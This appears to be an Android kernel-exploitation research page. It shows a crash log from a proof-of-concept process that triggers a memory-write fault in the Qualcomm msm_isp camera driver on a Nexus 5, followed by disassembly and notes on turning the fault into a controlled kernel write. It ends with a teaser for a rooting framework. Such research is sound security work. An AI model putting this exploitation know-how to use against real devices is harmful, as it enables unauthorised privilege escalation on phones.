[   95.788261] 93f0  e59e30ec e0811003 e50b2038 ebffb345 eaffffc9 e5163008 e3730005 8a0000a3
[   95.790423] 9410  e59520b4 e2830004 e5921004 e5922000 e2811001 e0621001 e1510000 3a00009b
[   95.792586]
[   95.792592] LR: 0xc0709328:
[   95.792982] 9328  0a00002b e7953008 e1a00006 e59510c4 e2899001 e59330ec e2833004 e0811003
[   95.795129] 9348  ebffb372 e5942008 e1a0300a e1590122 2a000043 e594100c e3510004 e283a004
[   95.797288] 9368  e5936000 1affffec e7953008 e6ff0076 e59510c4 e1a06826 e59330ec e2833004
[   95.799289] 9388  e0811003 ebffb361 eaffffe5 e7962008 e59600c4 e59220ec e0800002 ebffb36b
[   95.801456] 93a8  e2892008 e1a09002 e4850008 e5941008 e15a0121 3affff5a e51b9030 e1a05006
[   95.803621] 93c8  e51b7048 e51b6038 e1d980b2 e1d920b0 eaffff99 e51b2038 e283a008 e795e008
[   95.805615] 93e8  e59510c4 e4920008 e59e30ec e0811003 e50b2038 ebffb345 eaffffc9 e5163008
[   95.807773] 9408  e3730005 8a0000a3 e59520b4 e2830004 e5921004 e5922000 e2811001 e0621001
[   95.809952]
[   95.809958] SP: 0xeae83cf0:
[   95.810359] 3cf0  ee002180 000080d0 00000010 c07093b0 60000013 ffffffff eae83d5c 00001dc8
[   95.812540] 3d10  ed7c3008 00000001 eae83dc4 eae83d28 c0106f98 c0100254 00000000 00000009
[   95.814709] 3d30  ed7c3008 00000080 eb3c5ac0 2d7c3000 ed658000 00000000 00001dc8 ed7c3008
[   95.816695] 3d50  00000001 eae83dc4 eae83d70 eae83d70 c07093a8 c07093b0 60000013 ffffffff
[   95.818868] 3d70  22222222 22222222 22222222 ed7c3000 eae82030 00000000 eb3c5ac0 eb3c5ac8
[   95.821050] 3d90  00000000 eae83e24 00000003 c00c56c0 ed658000 ed658138 eae83e24 eae83e24
[   95.823042] 3db0  00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828 c0708e88 c00c56c0 ed658004
[   95.825055] 3dd0  eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c c070a5fc c00c56c0 c113a488
[   95.827216]
[   95.827222] IP: 0xeae83cf0:
[   95.827619] 3cf0  ee002180 000080d0 00000010 c07093b0 60000013 ffffffff eae83d5c 00001dc8
[   95.829797] 3d10  ed7c3008 00000001 eae83dc4 eae83d28 c0106f98 c0100254 00000000 00000009
[   95.831955] 3d30  ed7c3008 00000080 eb3c5ac0 2d7c3000 ed658000 00000000 00001dc8 ed7c3008
[   95.833943] 3d50  00000001 eae83dc4 eae83d70 eae83d70 c07093a8 c07093b0 60000013 ffffffff
[   95.835926] 3d70  22222222 22222222 22222222 ed7c3000 eae82030 00000000 eb3c5ac0 eb3c5ac8
[   95.838082] 3d90  00000000 eae83e24 00000003 c00c56c0 ed658000 ed658138 eae83e24 eae83e24
[   95.840235] 3db0  00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828 c0708e88 c00c56c0 ed658004
[   95.842374] 3dd0  eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c c070a5fc c00c56c0 c113a488
[   95.844378]
[   95.844384] FP: 0xeae83d44:
[   95.844948] 3d44  00000000 00001dc8 ed7c3008 00000001 eae83dc4 eae83d70 eae83d70 c07093a8
[   95.846939] 3d64  c07093b0 60000013 ffffffff 22222222 22222222 22222222 ed7c3000 eae82030
[   95.849107] 3d84  00000000 eb3c5ac0 eb3c5ac8 00000000 eae83e24 00000003 c00c56c0 ed658000
[   95.851258] 3da4  ed658138 eae83e24 eae83e24 00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828
[   95.853419] 3dc4  c0708e88 c00c56c0 ed658004 eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c
[   95.855414] 3de4  c070a5fc c00c56c0 c113a488 0000000c 00000000 eae83ed4 eae83e08 c07320c4
[   95.857583] 3e04  c0738710 ed131000 00000002 0000001a e99866c0 c0738704 bea979e8 00040006
[   95.859751] 3e24  04000001 b6d07400 b6d18030 00000001 eae83e40 c0a957e8 c01e3954 ed131000
[   95.861757]
[   95.861763] R2: 0xed7c2f88:
[   95.862325] 2f88  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.864481] 2fa8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.866465] 2fc8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.868646] 2fe8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 42424242
[   95.870820] 3008  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.872833] 3028  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.874999] 3048  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.877169] 3068  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.879335]
[   95.879340] R4: 0xeb3c5a40:
[   95.879740] 5a40  c1b815c0 eb3c5284 eb3c5784 00000000 00000000 00000000 00307300 32313563
[   95.881912] 5a60  36376300 e9000038 00000001 00000000 f3affad8 0000000a 00000871 00000000
[   95.883904] 5a80  0000e4a6 e9a77b45 00000000 00000000 e9a77b50 00000000 00000000 00000000
[   95.886052] 5aa0  ea0762a0 ec001800 ea076280 0000000a 00000001 00000001 e9ad5e00 00000000
[   95.888204] 5ac0  40000000 00000000 00000200 00000009 00000000 00000000 00000000 00000000
[   95.890365] 5ae0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.892338] 5b00  0000018e 0000018e 0000006f 00000001 00000000 00000000 00000000 00000000
[   95.894492] 5b20  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.896665]
[   95.896671] R6: 0xed657f80:
[   95.897063] 7f80  00000001 ee3d1d80 00000000 c051aea4 00000000 00000000 00000000 00000000
[   95.899223] 7fa0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.901377] 7fc0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.903354] 7fe0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.905481] 8000  ee132a00 ed660004 c119daa0 ed8ee800 00000010 ed62d040 00020000 00000000
[   95.907631] 8020  00000000 00000003 00000000 00000000 00000000 00000010 00000000 00000000
[   95.909799] 8040  00000000 00000000 00000051 00000014 00000000 ed660054 c119daf0 00000000
[   95.911790] 8060  0000000c ed61c680 c119e108 c119e0f8 00000000 00656676 00000000 00000000
[   95.913783]
[   95.913789] R9: 0xed7c2f88:
[   95.914187] 2f88  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.916355] 2fa8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.918509] 2fc8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.920669] 2fe8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 42424242
[   95.922651] 3008  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.924641] 3028  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.926803] 3048  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.928810] 3068  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.930993] Process poc (pid: 3053, stack limit = 0xeae822f0)
[   95.931407] Stack: (0xeae83d70 to 0xeae84000)
[   95.931627] 3d60:                                     22222222 22222222 22222222 ed7c3000
[   95.932027] 3d80: eae82030 00000000 eb3c5ac0 eb3c5ac8 00000000 eae83e24 00000003 c00c56c0
[   95.932429] 3da0: ed658000 ed658138 eae83e24 eae83e24 00000003 eb3a8cc0 eae83de4 eae83dc8
[   95.932663] 3dc0: c070a828 c0708e88 c00c56c0 ed658004 eae83e24 eb3a8cc0 eae83e04 eae83de8
[   95.933064] 3de0: c0738a6c c070a5fc c00c56c0 c113a488 0000000c 00000000 eae83ed4 eae83e08
[   95.933467] 3e00: c07320c4 c0738710 ed131000 00000002 0000001a e99866c0 c0738704 bea979e8
[   95.933701] 3e20: 00040006 04000001 b6d07400 b6d18030 00000001 eae83e40 c0a957e8 c01e3954
[   95.934109] 3e40: ed131000 00000002 ed135bc0 0000000a 0000001a e99866c0 eae83e74 eae83e68
[   95.934510] 3e60: c0a958d4 c01c91d0 eae83eb4 00000001 eae83e94 c117fc38 60000013 00000001
[   95.934911] 3e80: 00000003 00000000 eae82000 c01c91dc eae83ecc eae83ea0 c01c91dc c0a9821c
[   95.935140] 3ea0: 00000000 a19364fd c01c91dc ed653800 eb3a8cc0 bea979e8 c00c56c0 ed171a28
[   95.935537] 3ec0: bea979e8 00000000 eae83ee4 eae83ed8 c0738700 c0731dfc eae83f0c eae83ee8
[   95.935936] 3ee0: c072c504 c07386ec c072c458 eb3a8cc0 00000003 c00c56c0 eb3a8cc0 ed171a28
[   95.936340] 3f00: eae83f74 eae83f10 c02831c8 c072c464 c1a656c0 0000000b 00000000 eae83f08
[   95.936569] 3f20: 00000000 eae83f00 eae82000 b6d18030 bea979e8 c00c56c0 eb3a8cc0 00000003
[   95.936970] 3f40: eae82000 00000000 eae83f64 00000000 bea979e8 c00c56c0 eb3a8cc0 00000003
[   95.937369] 3f60: eae82000 00000000 eae83fa4 eae83f78 c02833f8 c0282dc8 00000000 00000000
[   95.937598] 3f80: c0107644 b6d18030 bea979e8 00000003 00000036 c0107644 00000000 eae83fa8
[   95.937998] 3fa0: c0107400 c0283388 b6d18030 bea979e8 00000003 c00c56c0 bea979e8 bea979d8
[   95.938396] 3fc0: b6d18030 bea979e8 00000003 00000036 000080f4 00000000 00000000 bea97a7c
[   95.938794] 3fe0: 40000000 bea979c8 0000e443 00011244 80000010 00000003 00000000 00000000
[   95.939054] [<c07093b0>] (msm_isp_proc_cmd+0x534/0x8b4) from [<c070a828>] (msm_isp_ioctl+0x238/0x3b0)
[   95.939488] [<c070a828>] (msm_isp_ioctl+0x238/0x3b0) from [<c0738a6c>] (subdev_do_ioctl+0x368/0x554)
[   95.939923] [<c0738a6c>] (subdev_do_ioctl+0x368/0x554) from [<c07320c4>] (video_usercopy+0x2d4/0x594)
[   95.940359] [<c07320c4>] (video_usercopy+0x2d4/0x594) from [<c0738700>] (subdev_ioctl+0x20/0x24)
[   95.940785] [<c0738700>] (subdev_ioctl+0x20/0x24) from [<c072c504>] (v4l2_ioctl+0xac/0x160)
[   95.941044] [<c072c504>] (v4l2_ioctl+0xac/0x160) from [<c02831c8>] (do_vfs_ioctl+0x40c/0x5c0)
[   95.941473] [<c02831c8>] (do_vfs_ioctl+0x40c/0x5c0) from [<c02833f8>] (sys_ioctl+0x7c/0x8c)
[   95.941906] [<c02833f8>] (sys_ioctl+0x7c/0x8c) from [<c0107400>] (ret_fast_syscall+0x0/0x30)
[   95.942318] Code: e0800002 ebffb36b e2892008 e1a09002 (e4850008)
[   95.945358] ---[ end trace 73ebd40746349828 ]---
[   95.946015] Kernel panic - not syncing: Fatal exception
[   96.946453] Rebooting in 5 seconds..
[  101.948083] Going down for restart now
[  101.948958] Calling SCM to disable SPMI PMIC arbiter

No errors detected
Boot info:
Last boot reason: kernel_panic

crash dis asm

nexus 5 - cm13

LDR             R2, [R6,R8]
LDR             R0, [R6,#0xC4]
LDR             R2, [R2,#0xEC]
ADD             R0, R0, R2
BL              msm_camera_io_r
ADD             R2, R9, #8
MOV             R9, R2
STR             R0, [R5],#8            // !!! crash
LDR             R1, [R4,#8]
CMP             R10, R1,LSR#2
BCC             loc_C070912C

r0 = 0

so could write 0 to (kptr + hitbloffset /4)

kptr is cfg_data

cfgdata = kzalloc(proccmd->cmdlen, GFPKERNEL);

how to control cfg_data ?

Android Root Zap Framework

‎ 1. Warning 请遵守GPL开源协议, 请遵守法律法规, 本项目仅供学习和交流, 请勿用于非法用途! 道路千万条, 安全第一条, 行车不规范, 亲人两行泪. 2. Android Root Zap Frame...